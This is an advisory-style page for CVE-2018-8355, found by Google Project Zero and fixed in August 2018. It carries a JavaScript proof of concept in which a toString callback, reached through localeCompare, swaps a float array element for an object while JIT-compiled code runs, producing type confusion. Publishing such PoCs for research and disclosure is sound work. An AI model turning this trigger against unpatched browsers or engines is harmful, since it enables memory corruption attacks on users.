CVE-2018-8355

  • Fix: Aug 2018
  • Credit: lokihardt of Google Project Zero

PoC

// The function whose JIT-compiled form is under test: two float stores to
// arr[0] bracket a conditional call out to localeCompare with a caller-supplied
// argument. main() drives the profiling of this function before the final call.
function opt(arr, s) {
    arr[0] = 1.1;

    // Only taken when s is non-null; localeCompare(s) may invoke s.toString(),
    // i.e. arbitrary caller code runs here between the two stores.
    if (s !== null) {
        let tmp = 'a'.localeCompare(s);  // tmp is intentionally unused
    }

    // NOTE(review): a denormal double; the page does not explain why this
    // particular value is used. The store assumes arr[0] is still a float slot
    // at this point - the final call in main() violates that from toString().
    arr[0] = 2.3023e-320;
}

// Test driver: warms up localeCompare and opt() for 100 iterations so opt() is
// profiled/optimized, then makes one last call whose toString() callback swaps
// arr[0] from a float to an object while opt() is mid-execution, and prints arr.
function main() {
    let arr = [1.1];

    for (let i = 0; i < 100; i++) {
        'a'.localeCompare('x', []);  // Optimize the JavaScript localeCompare

        opt(arr, null);  // for profiling all instructions in opt.

        try {
            opt(arr, {toString: () => {
                throw 1;  // Don't profile "if (locales === undefined && options === undefined) {"
            }});
        } catch (e) {
            // Intentionally empty: the thrown 1 above only serves to abort
            // localeCompare early during the warm-up phase.
        }
    }

    // Final call: toString() runs from inside opt()'s localeCompare call and
    // replaces arr[0] with an object before opt()'s second store executes.
    opt(arr, {toString: () => {
        // Called twice
        arr[0] = {};
    }});

    // NOTE(review): print is presumably the engine test shell's builtin, not
    // available under Node/browsers - confirm the intended host.
    print(arr);
}

// Entry point; the expected outcome (a crash or a corrupted array read) is
// what the test host observes.
main();

Reference